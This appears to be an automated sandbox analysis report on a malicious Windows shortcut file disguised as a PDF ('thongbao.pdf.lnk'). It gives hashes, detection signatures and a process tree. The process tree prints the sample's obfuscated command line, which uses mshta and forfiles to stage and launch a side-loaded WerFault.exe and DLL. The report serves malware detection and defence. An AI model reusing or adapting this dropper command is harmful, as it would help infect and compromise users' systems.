Edit tour
Windows
Analysis Report
p3a3TSUccX.lnk
Overview
General Information
Sample name: | p3a3TSUccX.lnkrenamed because original name is a hash value |
Original sample name: | 6b8be94da26dafffea2d0cafaeaa36dd96faced23d76c8bcd218b1efd1273e60.lnk |
Analysis ID: | 1500949 |
MD5: | 54f4610b378845315fb6dbae629cd97c |
SHA1: | 59e38278a7f81438fe075789706a2b7e0b49184f |
SHA256: | 6b8be94da26dafffea2d0cafaeaa36dd96faced23d76c8bcd218b1efd1273e60 |
Tags: | lnk |
Infos: | |
Detection
MalLnk
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected malicious lnk
AI detected suspicious sample
Obfuscated command line found
Sigma detected: Suspicious Parent Double Extension File Execution
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Creates a process in suspended mode (likely to inject code)
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Copy From or To System Directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 6464 cmdline:
"C:\window s\System32 \cmd.exe" $r$u$n$d$l $l$3$2 $S$he $ll$3$2$.d ll $$S$h$e $l$l$E$x$e $c_R$un$D$ L$L "cmd" /c (( if not exist "tho ngbao.pdf. lnk" (f^o^ r^fi^les / P C:\Users \user /S / M "thongba o.pdf.lnk" /C "cmd / c copy "@p ath" "C:\U sers\user\ IAMHERE.al f"") else (copy "%CD %\thongbao .pdf.lnk" "C:\Users\ user\IAMHE RE.alf")) && m^s^h^t ^a"."exe " C:\Users\u ser\IAMHER E.alf" && (if not ex ist "C:\Us ers\user\A ppData\Roa ming\Lenov o\faultrep .dll" (tim eout 5 && (if not ex ist "C:\Us ers\user\A ppData\Roa ming\Lenov o\faultrep .dll" (exi t) else (s tart /min "" "C:\Use rs\user\Ap pData\Roam ing\Lenovo \WerFault. exe")))els e (timeout 1 && star t /min "" "C:\Users\ user\AppDa ta\Roaming \Lenovo\We rFault.exe "))) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6856 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - forfiles.exe (PID: 6228 cmdline:
forfiles / P C:\Users \user /S / M "thongba o.pdf.lnk" /C "cmd / c copy "@p ath" "C:\U sers\user\ IAMHERE.al f"" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MalLnk | Yara detected malicious lnk | Joe Security |
System Summary |
---|
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): |